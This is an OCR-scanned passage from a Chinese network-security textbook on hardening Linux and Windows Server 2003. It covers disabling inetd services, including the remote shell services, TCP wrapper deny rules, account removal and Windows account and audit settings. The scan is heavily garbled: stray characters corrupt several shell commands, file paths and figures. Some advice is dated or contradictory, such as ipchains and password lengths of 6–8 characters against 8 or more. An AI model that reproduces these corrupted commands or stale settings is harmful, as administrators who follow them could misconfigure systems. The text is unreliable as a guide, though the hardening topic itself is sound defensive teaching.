software/coreutils/ ,于 是 可 以 去 这 个 地 址 下 载 到 coreutils 的 源 代码 ,然后 在 其 中 找到 cat; 

Linux 是 在 共用 许可 证 GPL( General Public License) 保 护 下 的 自由 软件 ,也 有 好 几 种 
版 本 ,如 Ubuntu, Red Hat Linux, Slackware. 以 及 国内 的 Xteam Linux、 红 旋 Linux 等 。 
Linux 的 流行 是 因为 它 具 有 许多 优点 ,优点 如 下 : 

(1) 完全 免费 。 

(2) 完全 兼容 POSIX 1.0 标准 ,为 一 个 POSIX 兼容 的 操作 系统 编写 的 程序 ,可 以 在 任 
何其 他 的 POSIX 操作 系统 (即使 是 来 自 另 一 个 厂商 ) 上 编译 执行 。 

(3) 多 用 户 、 多 任务 。 

(4) 良好 的 界面 。 

(5) 丰富 的 网 络 功能 。 

(6) 可 靠 的 安全 、 稳 定性 能 。 

(7) 支持 多 种 平台 。 


3.1.2 Linux 安全 配置 


1. 磁盘 分 区 

如 果 是 新 安装 系统 ,对 磁盘 分 区 应 考虑 安全 性 。 

CD 根 目录 (/) JH P! Hot C/home) ,临时 目录 (/tmp) 和 /var 目录 应 分 开 到 不 同 的 磁盘 
分 区 。 

(2) 以 上 各 目录 所 在 分 区 的 磁盘 空间 大 小 应 充分 考虑 ,避免 由 于 某 些 原因 造成 分 区 空 
间 用 完 而 导致 系统 崩溃 。 

2. 安装 

CD 对 于 非 测 试 主机 ,不 应 安装 过 多 的 软件 包 。 这 样 可 以 降低 因 软件 包 而 导致 出 现 安 
全 漏洞 的 可 能 性 。 

(2) 对 于 非 测 试 主机 ,在 选择 主机 启动 服务 时 不 应 选择 非 必需 的 服务 。 例 如 routed, 
ypbind 等 。 

3. 安全 配置 与 增强 配置 

关闭 危险 的 网 络 服务 ,echo .chargen、shell login finger、NFS、RPC 等 。 

关闭 非 必需 的 网 络 服务 ,talk .ntalk .pop-2 等 。 

常见 网 络 服务 安全 配置 与 升级 ,确保 网 络 服务 所 使 用 版 本 为 当前 最 新 和 最 安全 的 版 本 。 

取消 匿名 FTP 访问 。 

去 除非 必需 的 suid 程序 。 

使 用 tcpwrapper, 网 络 服务 的 访问 控制 工具 。 

使 用 ipchains 防火 墙 。 

日 志 系统 syslogd。 

具体 操作 如 下 : 

(1) 操作 系统 内 部 的 log file 是 检测 是 否 有 网 络 人 侵 的 重要 线索 ,当然 假定 log file 不 
被 侵入 者 所 破坏 ,如 果 有 人 台 服 务 器 用 专线 直接 连 到 Internet. 上 ,这 意味 着 你 的 IP 地 址 是 永 
久 固 定 的 地 址 ,你 会 发 现 有 很 多 人 对 你 的 系统 做 telnet/ftp 登录 尝试 , 试 着 运行 # more/ 
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var/log/secure| grep refused 去 检查 。 

(2) 限制 具有 SUID 权限 标志 的 程序 数量 ,具有 该 权限 标志 的 程序 以 root 身份 运行 ,是 
一 个 潜在 的 安全 漏洞 ,当然 ,有 些 程序 是 必须 要 具有 该 标志 的 , 像 passwd 程序 。 

(3) 用 户 密 码 。 用 户 密 码 是 Linux 安全 的 一 个 最 基本 的 起 点 ,很 多 人 使 用 的 用 户 密码 
就 是 简单 的 password, 这 等 于 给 侵入 者 敞开 了 大 门 , 从 理论 上 说 只 要 有 足够 的 时 间 和 资源 
就 可 以 破解 用 户 的 密码 ,好 的 用 户 密 码 应 不 低 于 8 位 字符 并 且 不 要 在 密码 中 含有 任何 泄露 
个 人 资料 的 信息 ,如 ,出 生日 期 ,应 尽量 多 使 用 不 常用 符号 和 数字 组 合 ,并 区 分 大 小 写 。 

(4) /etc/exports 文件 。 如 果 你 使 用 NFS 网 络 文件 系统 服务 ,那么 确保 你 的 /etc/ 
exports 具有 最 严格 的 存 取 权限 设置 ,这 意味 着 不 要 使 用 任何 通配符 ,不 允许 root 写 权 限 ， 
mount 成 只 读 文 件 系 统 。 编 辑 文件 /etc/exports 并 修改 。 例 如 : 


/dir/to/export hostl.mydomain.com(ro, root squash) 

/dir/to/export host2.mydomain.com(ro, root squash) 

/ dir/to/export 是 想 输出 的 目录 ,而 host. mydomain. com 是 登录 这 个 目录 的 机 器 名 ,ro 
意味 着 mount 成 只 读 系 统 root. squash 禁止 root 写 入 该 目录 。 

为 了 让 上 面 的 改变 生效 ,运行 /usr/sbin/exportfs -a。 

(5) 确信 /etc/inetd. conf 的 所 有 者 是 root, 且 文件 权限 设置 为 600。 

[root@deep]# chmod 600 /etc/inetd. conf 

ENSURE that the owner is root. 

[root@deep]# stat /etc/inetd.conf 

File: "/etc/inetd. conf" 

Size: 2869 Filetype: Regular File 

Mode: (0600/ - rw------- ) Uid: (0/ root) Gid: (0/ root) 

Device: 8,6 Inode: 18219 Links: 1 

Access: Wed Sep 22 16:24:16 1999(00000. 00:10:44) 

Modify: Mon Sep 20 10:22:44 1999(00002.06:12:16) 

Change:Mon Sep 20 10:22:44 1999(00002.06:12:16) 


编辑 /etc/inetd. conf 禁止 以 下 服务 : 

ftp. telnet, shell login. exec.talk.ntalk.imap. pop-2. pop-3.finger.auth.etc, [fEff E 
的 想 用 它 。 

特别 是 禁止 那些 r 命令 ,如果 你 用 ssh/scp, 那 么 你 也 可 以 禁止 掉 telnet/ftp。 

为 了 使 改变 生效 ,运行 # killall -HUP inetd。 

你 也 可 以 运行 #chattr 十 i /etc/inetd. conf 使 该 文件 具有 不 可 更 改 属性 。 

只 有 root 才能 解 开 ,用 命令 #chattr -i /etc/inetd. conf, 

(6) TCP WRAPPERS, 

默认 地 ,Redhat Linux 允许 所 有 的 请 求 ,用 TCP. WRAPPERS 增强 站 点 的 安全 性 ,你 
可 以 写 人 “ALL: ALL"$]/etc/hosts. deny 中 禁止 所 有 的 请 求 , 然 后 写 那些 明确 允许 的 请 求 
到 /etc/hosts. allow 中 ,如 下 所 示 。 


sshd: 192.168.1.10/255.255.255.0 gate. openarch. com 


对 IP 地 址 192. 168. 1. 10 和 主机 名 gate. openarch. com. 允许 通过 SSH 连接 。 配 置 完 
了 之 后 ,用 tepdchk 检查 。 
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[root(2deep]£& tcpdchk 


tepchk 是 TCP. Wrapper 配置 检查 工具 , 它 检 查 你 的 tep wrapper 配置 并 报告 所 有 发 现 
的 潜在 和 存在 的 问题 。 

CD 别名 文件 aliases。 

编辑 别名 文件 /etc/aliases( 也 可 能 是 /etc/mail/aliases) , 移 走 /注释 掉 下 面 的 行 。 

# Basic system aliases -- these MUST be present. 

MAILER - DAEMON: postmaster 

postmaster: root 

# General redirections for pseudo accounts. 

bin: root 

daemon: root 

# games: root ?remove or comment out. 

# ingres: root ? remove or comment out. 

nobody: root 

# system: root ?remove or comment out. 

# toor: root ?remove or comment out. 

# uucp: root ?remove or comment out. 

# Well- known aliases. 

# manager: root ?remove or comment out. 

# dumper: root ? remove or comment out. 

# operator: root ?remove or comment out. 

# trap decode to catch security attacks 

# decode: root 

# Person who should get root's mail 

# root: marc 


最 后 更 新 后 不 要 忘记 运行 /usr/bin/newaliases ,使 改变 生效 。 

(8) 阻止 你 的 系统 响应 任何 从 外 部 /内 部 来 的 ping 请 求 。 

如 果 没 有 人 能 ping 通 你 的 机 器 并 收 到 响应 ,就 可 以 大 大 增强 你 的 站 点 的 安全 性 。 你 可 
以 加 下 面 的 一 行 命令 到 /etcyrc. d/rc. local, 以 使 每 次 启动 后 自动 运行 。 


echo 1 >; /proc/sys/net/ipv4/icmp echo ignore all 


(9) 不 要 显示 出 操作 系统 和 版 本 信息 。 
如 果 你 希望 某 个 人 远程 登录 到 你 的 服务 器 时 不 要 显示 操作 系统 和 版 本 信息 ,你 可 以 像 
下 面 这 样 改变 /etc/inetd. conf 中 的 一 行 ; 


telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd -h 


在 最 后 加 一 h 标志 使 得 telnet 后 台 不 显示 系统 信息 ,而 仅仅 显示 login, 

(10) 特别 的 账号 。 

禁止 所 有 默认 的 被 操作 系统 本 身 启动 的 且 不 需要 的 账号 , 当 你 第 一 次 装 上 系统 时 就 应 
该 做 此 检查 。Linux 提供 了 各 种 账号 ,你 可 能 不 需要 ,如 果 你 不 需要 这 个 账号 ,就 移 走 它 , 你 
有 的 账号 越 多 ,就 越 容易 受到 攻击 。 


[root@deep]# userdel username 删除 系统 上 的 用 户 
[root@deep]# groupdel username 删除 系统 上 的 组 用 户 账号 


在 终端 上 输入 下 面 的 命令 删 掉 下 面 的 用 户 。 
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root(àdeep]it userdel adm 

root(àdeep]£ userdel lp 

root(àdeep]it userdel sync 

root(àdeep]it userdel shutdown 

root(àdeep]it userdel halt 

root(àdeep]it userdel mail 

root(àdeep]it userdel gopher An RS HI X Windows 服务 器 ,就 删 掉 这 个 账号 . 
root@deep]# userdel ftp 如 果 不 允许 匿名 FIP, 就 删 掉 这 个 用 户 账号 . 
root(@deep]# groupdel adm 删除 组 账号 

root@deep]# groupdel lp 

root@deep]# groupdel mail 如 不 用 Sendmail 服务 器 ,删除 这 个 组 账号 


用 下 面 的 命令 建立 用 户 账号 

root@deep]# useradd username 

用 下 面 的 命令 改变 用 户口 令 

root@deep]# passwd username 

用 chattr 命令 给 下 面 的 文件 加 上 不 可 更 改 属性 。 


root(üdeep]£& chattr + i /etc/passwd 

root(üdeep]it chattr + i /etc/shadow 

root(àdeep]it chattr + i /etc/group 

root@deep]# chattr + i /etc/gshadow 

(11) 阻止 任何 人 su 作为 root。 

如 果 你 不 想 任何 人 能 够 su 作为 root, 编 辑 /ete/ pam. d/su 加 下 面 的 行 ; 


auth sufficient /lib/security/pam rootok.so debug 


auth required /lib/security/pam wheel. so group—isd 仅仅 isd 组 的 用 户 可 以 su 作为 root, 
如 果 你 希望 用 户 admin 能 su 作为 root ,就 运行 下 面 的 命令 。 


[root@deep]# usermod - G10 admin 


(2) 资源 限制 。 

对 你 的 系统 上 所 有 的 用 户 设置 资 源 限制 可 以 防止 DoS 类 型 攻击 (Denial of Service 
Attacks) ,如 最 大 进程 数 、 内 存 数量 等 。 例 如 , 像 下 面 这 样 限制 所 有 的 用 户 : 

编辑 /etc/security/limits. con 加 : 

* hard rss 5000 

* hard nproc 20 

你 也 必须 编辑 /etc/pam. d/login 文件 加 session required /lib/security/pam limits. so 
检查 这 一 行 的 存在 。 

上 面 的 命令 限制 进程 数 为 20(nproc 20) , 且 限 制 内 存 使 用 为 5M(rss 5000) 。 

(13) 禁止 Ctrl 十 Alt 十 Delete 重启 动机 器 命令 。 

[root@deep]# vi /etc/inittab 

ca::ctrlaltdel:/sbin/shutdown - t3 -r now 

To 


# ca::ctrlaltdel:/sbin/shutdown - t3 - r now 
[root@deep]# /sbin/init q 


48 计算 机 网 络 安全 与 实验 教程 


(14) 重新 设置 /etc/rc. d/init. d/ 目 录 下 所 有 文件 的 许可 权限 。 

[root@deep]# chmod -R 700 /etc/rc. d/init. d/ * fX root 可 以 读 , 写 ,执行 。 

(15) The /etc/rc. d/rc. local file, 

默认 地 , 当 你 login 到 Linux Server 时 , 它 告诉 你 Linux 版 本 名 ,内 核 版 本 名 和 服务 器 
主机 名 。 登 录 后 显示 了 比较 多 的 信息 ,如 果 只 希望 显示 login, 编 辑 /etc/rc. d/rc. local, Jt & 
在 下 面 的 行 前 面 : 


# This will overwrite /etc/issue at every boot. So, make any changes you 
# want to make to /etc/issue here or you will lose them when you reboot. 
& echo "" >; /etc/issue 

# echo " $ R" »;»; /etc/issue 

# echo "Kernel $ (uname -r) on $a $ (uname -m)" >;>; /etc/issue 

# 

#cp -f /etc/issue /etc/issue. net 

# echo >;>; /etc/issue 


然后 ,执行 下 面 的 操作 


[root@deep]# rm - f /etc/issue 
[root@deep]# rm - f /etc/issue.net 
[root@deep]# touch /etc/issue 
[root(2deep]£& touch /etc/issue. net 


3.1.3 Linux 下 建议 替换 的 常见 网 络 服务 应 用 程序 


1. WuFTPD 

WuFTD 从 1994 年 就 开始 就 不 断 地 出 现 安全 漏洞 ,黑客 很 容易 就 可 以 获得 远程 root 访 
问 (Remote Root Access) 的 权限 ,而 且 很 多 安全 漏洞 甚至 不 需要 在 FTP 服务 器 上 有 一 个 有 
效 的 账号 。 最 近 ,WuFTP 也 是 频频 出 现 安全 漏洞 。 

WuFTP 的 最 好 的 替代 程序 是 ProFTPD, ProFTPD 很 容易 配置 ,在 多 数 情 况 下 速度 也 
比较 快 ,而且 它 的 源 代码 也 比较 干净 (缓冲 溢出 的 错误 比较 少 )。 有 许多 重要 的 站 点 使 用 
ProFTPD, sourceforge. net 就 是 一 个 很 好 的 例子 (这 个 站 点 共有 3000 个 开放 源 代 码 的 项 
目 ,其 负荷 并 不 小 )。 一 些 Linux 的 发 行商 在 它们 的 主 FTP 站 点 上 使 用 的 也 是 ProFTPD， 
只 有 两 个 主要 Linux 的 发 行商 (SuSE 和 Caldera) 使 用 WuFTPD, 

2. Telnet 

Telnet 是 非常 不 安全 的 , 它 用 明文 来 传送 密码 。 它 的 安全 的 替代 程序 是 OpenSSH, 
OpenSSH 在 Linux 上 已 经 非常 成 熟 和 稳定 了 ,而 且 在 Windows 平台 上 也 有 很 多 免费 的 客 
户 端 软件 。Linux 的 发 行商 应 该 采用 OpenBSD 的 策略 : 安装 OpenSSH 并 把 它 设 置 为 默认 
的 ,安装 Telnet 但 是 不 把 它 设 置 成 默认 的 。 

Telnet 是 不 安全 的 程序 。 要 保证 系统 的 安全 必须 用 OpenSSH 这 样 的 软件 来 替代 它 。 

3. Sendmail 

最 近 这 些 年 ,Sendmail 的 安全 性 已 经 提高 很 多 了 (以 前 它 通常 是 黑客 重点 攻击 的 程 
序 )。 然 而 ,Sendmail 还 是 有 一 个 很 严重 的 问题 。 一 旦 出 现 了 安全 漏洞 (例如 : 最 近 出 现 的 
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Linux 内 核 错误 ) ,Sendmail 就 是 被 黑客 重点 攻击 的 程序 ,因为 Sendmail 是 以 root 权限 运行 
的 而 且 代 码 很 庞大 容易 出 问题 。 

几乎 所 有 的 Linux 发 行商 都 把 Sendmail 作为 默认 的 配置 ,只 有 少数 几 个 把 Postfix 或 
Qmail 作为 可 选 的 软件 包 。 但 是 ,很 少 有 Linux 的 发 行商 在 自己 的 邮件 服务 器 上 使 用 
Sendmail。SuSE 和 Red Hat 都 使 用 基于 Qmail 的 系统 。 

Sendmail 并 不 一 定 会 被 别 的 程序 完全 替代 。 但 是 它 的 两 个 替代 程序 Qmail 和 Postfix 
都 比 它 安 全 、 速 度 快 ,特别 是 Postfix 比 它 容易 配置 和 维护 。 

4. su 

su 是 用 来 改变 当前 用 户 的 ID, 转 换 成 别 的 用 户 。 你 可 以 以 普通 用 户 登 录 , 当 需要 以 
root 身份 做 一 些 事 的 时 候 , 只 要 执行 “su 命令, 然后 输入 root 的 密码 。su 本 身 是 没有 问题 的 ， 
但 是 它 会 让 人 养 成 不 好 的 习惯 。 如 果 一 个 系统 有 多 个 管理 员 ,必须 都 给 他 们 root 的 口令 。 

su 的 一 个 替代 程序 是 sudo. Ubuntu 和 Red Hat 6.2 中 包含 这 个 软件 。sudo 允许 你 设 
置 哪个 用 户 哪 个 组 可 以 以 root 身份 执行 哪些 程序 。 你 还 可 以 根据 用 户 登 录 的 位 置 对 他 们 
加 以 限制 (如 果 有 人 破解 了 一 个 用 户 的 口令 ,并 用 这 个 账号 从 远程 计算 机 登录 ,你 可 以 限制 
他 使 用 sudo), Debian 也 有 一 个 类 似 的 程序 叫 super, 与 sudo 相 比 各 有 优 缺 点 。 

让 用 户 养 成 良好 的 习惯 。 使 用 root 账号 并 让 多 个 人 知道 root 的 密码 是 不 安全 的 ,这 就 
Æ www. apache. org 被 和 人 侵 的 原因 ,因为 它 有 多 个 系统 管理 员 ,他们 都 有 root 的 特权 。 

5. named 

named 以 前 是 以 root 运行 的 ,因此 当 named 出 现 新 的 漏洞 的 时 候 , 很 容易 就 可 以 人 侵 
一 些 很 重要 的 计算 机 并 获得 root 权限 。 大 部 分 Linux 的 发 行商 都 解决 了 这 个 问题 。 现 在 
只 要 用 命令 行 的 一 些 参数 就 能 让 named 以 非 root 的 用 户 运行 。 而 且 , 现 在 绝 大 多 数 Linux 
的 发 行商 都 让 named 以 普通 用 户 的 权限 运行 。 命 令 格式 通常 为 : 


named —u «user name>; -g <group name»; 
3.1.4. Linux 下 安全 守则 


(1) 废除 系统 所 有 默认 的 账号 和 密码 。 

(2) 在 用 户 合法 性 得 到 验证 前 不 要 显示 公司 题 头 、 在 线 帮 助 以 及 其 他 信息 。 

(3) 废除 “黑客 "可 以 攻击 系统 的 网 络 服务 。 

(4) 使 用 6 到 8 位 的 字母 数字 式 密码 。 

(5) 限制 用 户 尝试 登录 到 系统 的 次 数 。 

(6) 记录 违反 安全 性 的 情况 并 对 安全 记录 进行 复查 。 

(7) 对 于 重要 信息 ,上 网 传输 前 要 先进 行 加 密 。 

(8) 重视 专家 提出 的 建议 ,安装 他 们 推荐 的 系统 “补丁 ”。 

(9) 限制 不 需 密码 即 可 访问 的 主机 文件 。 

(10) 修改 网 络 配置 文件 ,以 便 将 来 自 外 部 的 TCP 连接 限制 到 最 少数 量 的 端口 。 不 允 
许 诸 如 TFTP.SunRPC.Printer. Rlogin 或 Rexec 之 类 的 协议 。 

(11) 用 Postfix 代替 Sendmail, Sendmail 有 太 多 已 知 漏洞 ,很 难 修补 完全 。 

(12) 去 掉 对 操作 并 非 至 关 重 要 又 极 少 使 用 的 程序 。 

(13) 使 用 chmod 将 所 有 系统 目录 变更 为 711 模式 。 这 样 ,攻击 者 们 将 无 法 看 到 它们 当 
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中 有 什么 东西 ,而 用 户 仍 可 执行 。 
(14) 只 要 可 能 ,就 将 磁盘 安装 为 只 读 模式 。 其 实 , 仅 有 少数 目录 需要 读 写 状 态 。 
(15) 将 系统 软件 升级 为 最 新 版 本 。 


3.2 Windows Server 2003 操作 系统 


Windows 2003 起 初 的 名 称 是 Windows. NET Server 2003,2003 年 1 月 9 日 正式 改名 
为 Windows Server 2003, 包 括 Standard Edition (标准 版 )、Enterprise Edition (企业 版 )、 
Datacenter Edition( 数 据 中 心 版 )、Web Edition( 网 络 版 )4 个 版 本 ,每 个 版 本 均 有 32 位 和 64 
位 两 种 编码 。 

Windows 2003 继承 了 Windows XP 的 友好 操作 性 和 Windows 2000 Sever 的 网 络 特 
性 ,是 一 个 同时 适合 个 人 用 户 和 服务 器 使 用 的 操作 系统 。Windows 2003 完全 延续 了 
Windows XP 安装 时 方便 ,快捷 ,高 效 的 特点 ,几乎 不 需要 多 少 人 工 参 与 就 可 以 自动 完成 硬 
件 的 检测 ` 安 装 .配置 等 工作 。 虽 然 在 名 称 上 , Windows 2003 又 延续 了 Windows 家 族 的 习 
惯 命名 法 则 ,但 从 其 提供 的 各 种 内 置 服务 以 及 重新 设计 的 内 核 程 序 来 说 , Windows 2003 与 
Windows 2000/XP 有 着 本 质 的 区 别 。Windows 2003 对 硬件 的 最 低 要 求 不 高 ,和 Windows 
2000 Server 相仿 。 


3.2.1 Windows Server 2003 的 特点 


1. 便于 部 署 .管理 和 使 用 

由 于 具有 熟悉 的 Windows 界面 ,Windows Server 2003 非常 易于 使 用 。 精 简 的 新 向 导 
简化 了 特定 服务 器 角色 的 安装 和 例 程 服务 器 管理 任务 ,从 而 使 即便 是 没有 专职 管理 员 的 服 
务 器 ,管理 起 来 也 很 简单 。 另 外 ,管理 员 拥 有 了 多 种 为 使 部 署 Active Directory 更 为 简便 而 
设计 的 新 功能 和 改进 功能 。 大 型 的 Active Directory 副本 可 以 从 备份 媒体 部 署 ,而 通过 使 用 
ActiDirectory 迁移 工具 (ADMT, 它 复制 密码 并 完全 支持 脚本 语言 ), 从 早期 的 服务 器 操作 
系统 (例如 Microsoft Windows NT) 升 级 则 更 简单 。 新 功能 (如 重 命名 域 和 重新 定义 架构 的 
功能 ) 使 维护 Active Directory 变 得 更 加 简单 ,并 赋予 管理 员 更 好 的 灵活 性 以 处 理 可 能 出 现 
的 组 织 更 改 。 另 外 ,交叉 林 信 任 使 得 管理 员 可 以 将 Active Directory 目录 林 连 接 起 来 ,从 而 
既 可 以 提供 自治 ,又 无 须 牺牲 集成 。 最 后 ,改进 的 部 署 工具 (如 远程 安装 服务 ) 帮 助 管理 员 快 
速 创建 系统 映像 并 部 署 服务 器 。 

2. 安全 的 基础 结构 

要 想 保 持 企业 的 竞争 力 ,高 效 、 安 全 的 计算 机 联网 处 理 比 以 往 任何 时 候 都 更 重要 。 
Windows Server 2003 使 企业 可 以 利用 现 有 IT 投资 的 优势 ,并 通过 部 署 关键 功能 (如 
Microsoft Active Directory 服务 中 的 交叉 林 信任 以 及 Microsoft . NET Passport 集成 ) 将 这 
些 优势 扩展 到 合作 伙伴 、 顾 客 和 供应 商 。Active Directory 中 的 标识 管理 的 范围 跨越 整个 网 
络 , 从 而 帮助 您 确保 整个 企业 的 安全 。 加 密 敏 感 数据 非常 简单 ,而 且 软 件 限 制 策 略 可 用 于 防 
止 由 病毒 和 其 他 恶意 代码 造成 的 破坏 。Windows Server 2003 是 部 署 公 钥 结构 (PKI) 的 最 
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佳 选 择 ,而 且 其 自动 注册 和 自动 续 订 功能 使 在 企业 中 部 署 智 能 卡 和 证 书 非常 简单 。 

3. 企业 级 可 靠 性 、 可 用 性 、 可 伸缩 性 和 性 能 

通过 一 系列 新 功能 和 改进 功能 (包括 内 存 镜像 、 热 添加 内 存 以 及 Internet 信息 服务 
AIS) 6.0 中 的 状态 检测 ) ,可靠 性 得 到 了 增强 。 为 了 获得 更 高 的 可 用 性 ,Microsoft 群集 服 
务 目 前 支持 高 达 8 节点 的 群集 以 及 位 置 上 分 开 的 节点 。 提 供 了 更 好 的 可 伸缩 性 ,可 以 支持 
从 单 处 理 器 到 32 路 系统 的 多 种 系统 。 总 之 , Windows Server 2003 的 文件 系统 性 能 比 以 往 
的 操作 系统 好 14076 ,并 且 Active Directory, XML Web 服务 .终端 服务 和 网 络 方面 的 性 能 
也 显著 增加 。 

4. 增强 和 采用 最 新 技术 ,降低 了 TCO 

Windows Server 2003 提供 许多 技术 革新 以 帮助 单位 降低 所 属 权 总 成 本 (TCO)。 例 
lil. Windows 资源 管理 器 使 管理 员 可 以 设置 服务 器 应 用 程序 的 资源 使 用 情况 (处 理 器 和 内 
存 ) 并 通过 组 策略 设置 管理 它们 。 附 加 于 网 络 的 存储 帮助 用 户 合并 文件 服务 。 其 他 改进 包 
括 对 非 唯一 内 存 访 问 (NUMA) „Intel 超 线 程 技术 和 多 路 径 输 入 /输出 (IO) 的 支持 ,而 所 有 
这 些 都 将 有 利于 “ 按 比例 增加 ”服务 器 性 能 。 

5. 便于 创建 动态 Intranet 和 Internet Web 站 点 

IIS 6.0 是 Windows Server 2003 中 包含 的 Web 服务 器 , 它 提 供 增强 的 安全 性 和 可 靠 的 
结构 (该 结构 提供 对 应 用 程序 的 孤立 并 极 大 地 提高 了 性 能 )。 其 结果 是 : 获得 了 更 高 的 总 体 
可 靠 性 和 运行 时 间 。 而 且 Microsoft Windows 媒体 服务 使 得 生成 具有 动态 内 容 编 程 以 及 更 
快 .更 可 靠 性 能 的 流 式 媒体 解决 方案 变 得 容易 。 

6. 用 Integrated Application Server 加 快 开发 速度 

Microsoft . NET 框架 是 深 深 集 成 在 Windows Server 2003 操作 系统 中 的 。Microsoft 
ASP. NET 帮助 您 生成 高 性 能 的 Web 应 用 程序 。 由 于 有 了 . NET-connected 技术 ,开发 人 
员 将 可 以 从 编写 单调 的 错综复杂 的 代码 中 解脱 出 来 ,并 且 可 以 用 他 们 已 经 掌握 的 编程 语言 
和 工具 高 效率 地 工作 。Windows Server 2003 提供 许多 提高 开发 人 员 生 产 效率 和 应 用 程序 
价值 的 功能 。 现 有 的 应 用 程序 可 以 被 简便 地 重新 打包 成 为 XML Web 服务 。UNIX 应 用 程 
序 可 以 被 简便 地 集成 或 迁移 。 并 且 , 开 发 人 员 可 以 通过 ASP. NET 移动 Web 窗 体 控 件 和 其 
他 工具 快速 生成 与 移动 有 关 的 Web 应 用 程序 和 服务 。 

7. 便于 查找 共享 和 重新 利用 XML Web 服务 

Windows Server 2003 包含 了 名 为 企业 通用 描述 、 发 现 与 集成 (Enterprise Universal 
Description. Discovery and Integration. UDDD 的 服务 。 这 一 基于 标准 的 XML Web 
Services 的 动态 弹性 基础 结构 可 让 组 织 运行 自己 的 UDDI 目录 ,用 于 在 内 部 或 外 部 网 络 更 
方便 地 搜索 Web Service 及 其 他 编程 资源 。 开 发 人 员 可 以 简便 快速 地 发 现 并 重新 使 用 组 织 
内 的 Web Service, IT 管理 人 员 可 以 分 类 和 管理 网 络 中 的 编程 资源 。 企 业 UDDI 服务 也 帮 
助 企 业 建 立 更 智能 、 更 可 靠 的 应 用 。 

8. 稳定 的 管理 工具 

新 的 组 策略 管理 控制 台 (GPMC) 预 计 可 作为 外 接 组 件 使 用 , 它 使 管理 员 可 以 更 好 地 
部 署 并 管理 那些 自动 调整 关键 配置 区 域 ( 如 用 户 的 桌面 .设置 .安全 和 漫游 配置 文件 ) 的 
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策略 。 管 理 员 可 以 用 一 套 新 的 命令 行 工 具 使 管理 功能 脚本 化 和 自动 化 ,如 果 需 要 ,大 多 
数 管理 任务 都 能 从 命令 行 完 成 。 对 Microsoft 软件 更 新 服务 (SUS) 的 支持 帮助 管理 员 使 
最 新 系统 更 新 自动 化 ,并 且 卷 影像 复制 服务 将 改进 备份 .还 原 和 系统 区 域 网 (SAN) 管 理 
性 任务 。 

9. 降低 支持 成 本 ,增强 用 户 功能 

由 于 有 了 新 的 影像 复制 功能 ,用 户 无 需 得 到 支持 专业 人 员 的 价格 不 菲 的 帮助 , 即 可 立即 
检索 到 以 前 版 本 的 文件 。 分 布 式 文件 系统 (DFS) 和 文件 复制 服务 (FRS) 的 增强 为 用 户 提 供 
一 种 一 致 的 方法 ,使 他 们 无 论 身 在 何 处 都 能 访问 其 文件 。 对 于 需要 高 级 别 安全 性 的 远程 用 
户 , 远 程 访问 连接 管理 器 可 以 被 配置 为 给 予 用 户 对 虚拟 专用 网 络 (VPN) 的 访问 权 , 而 不 需 
要 这 些 用 户 了 解 技 术 连 接 配 置信 息 。 


3.2.2 Windows Server 2003 安全 配置 


1. 停止 Guest 账号 

在 计算 机 管理 的 用 户 里 面 把 Guest 账号 停 用 ,任何 时 候 都 不 允许 Guest 账号 登录 系统 。 
为 了 保险 起 见 , 最 好 给 Guest 加 一 个 复杂 的 密码 。 可 以 打开 记事 本 ,在 里 面 输入 一 串 包含 特 
殊 字 符 数字、 字母 的 长 字符 串 , 用 它 作 为 Guest 账号 的 密码 ,并 且 修改 Guest 账号 的 属性 ， 
设置 拒绝 远程 访问 ,如 图 3-1 所 示 。 


DA |*mr|EmExe SA | 
远程 访问 权限 IO A mo 


C TED 

C OFIRI RR AD G) 

C 总 是 回执) 

厂 分 配角 者 P 地 址 加 ) = 
T SEWER QD 


为 此 拓 入 连接 定义 要 局 用 的 路 由 。 ets D 


3-1 设置 Guest 账号 属性 


2. 管理 员 账 号 改名 

Windows 2003 中 的 Administrator 账号 是 不 能 被 停 用 的 ,这 意味 着 别人 可 以 一 遍 又 一 
遍地 尝试 这 个 账户 的 密码 。 把 Administrator 账户 改名 可 以 有 效 地 防止 这 一 点 。 不 要 使 用 
Admin 之 类 的 名 字 , 改 了 等 于 没 改 ,尽量 把 它 伪装 成 普通 用 户 , 比 如 改 成 : guestone。 具 体 
操作 的 时 候 只 要 选中 账户 名 重 命名 就 可 以 了 ,如 图 3-2 所 示 。 
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3-2 修改 Administrator 账号 


3. 陷阱 账号 

所 谓 的 陷阱 账号 是 创建 一 个 名 为 *Administrator” 的 本 地 账户 ,把 它 的 权限 设置 成 最 
低 , 什 么 事 也 干 不 了 的 那 种 ,并 且 加 上 一 个 超过 10 位 的 超级 复杂 密码 。 这 样 可 以 让 那些 企 
图 入 侵 者 忙 上 一 段 时 间 了 ,并 且 可 以 借 此 发 现 他 们 的 入 侵 企图 。 可 以 将 该 用 户 隶 属 的 组 修 
HUR Guests 组 ,如 图 3-3 所 示 。 


axi 
seem o Ceg = 


Administrators 
Backup Operators 


Power Users 


图 3-3 修改 用 户 隶 属 的 组 


4. 安全 策略 

利用 Windows 2003 的 安全 配置 工具 来 配置 安全 策略 ,微软 提供 了 一 套 基 于 管理 控制 
人 台 的 安全 配置 和 分 析 工 具 , 可 以 配置 服务 器 的 安全 策略 。 在 管理 工具 中 可 以 找到 “本 地 安全 
策略 ”, 主 界面 如 图 3-4 所 示 ,可 以 配置 4 类 安全 策略 : 账户 策略 、 本 地 策略 、 公 钥 策略 和 IP 
安全 策略 。 在 默认 的 情况 下 ,这 些 策略 都 是 没有 开启 的 。 
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3-4 安全 策略 界面 


5. 设置 本 机 开放 的 端口 和 服务 

一 台 Web 服务 器 只 允许 TCP 的 80 端口 通过 就 可 以 了 。TCP/IP 筛选 器 是 Windows 
自 带 的 防火 墙 , 功 能 比较 强大 ,可 以 替代 防火 墙 的 部 分 功能 。 在 IP 地 址 设置 窗口 中 单 击 按 
钮 高级”, 在 出 现 的 对 话 框 中 选择 选项 卡 “ 选 项 ”, 选 中 “TCP/IP 筛选 *, 单 击 按钮 “属性 ”如 
图 3-5 所 示 。 
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3-5 TCP/IP 的 筛选 


6. 开启 审核 策略 

安全 审核 是 Windows 2003 最 基本 的 入 侵 检测 方法 。 当 有 人 尝试 对 系统 进行 某 种 方式 
(如 尝试 用 户 密码 ,改变 账户 策略 和 未 经 许可 的 文件 访问 等 ) 和 人 侵 的 时 候 , 都 会 被 安全 审核 记 
录 下 来 。 很 多 的 管理 员 在 系统 被 和 人 侵 了 几 个 月 都 不 知道 ,直到 系统 遭 到 破坏 。 表 3-1 的 这 
些 审核 是 必须 开启 的 ,其 他 的 可 以 根据 需要 增加 。 

审核 策略 在 默认 的 情况 下 都 是 没有 开启 的 ,如 图 3-6 所 示 。 双 击 审核 列表 的 某 一 项 ,出 
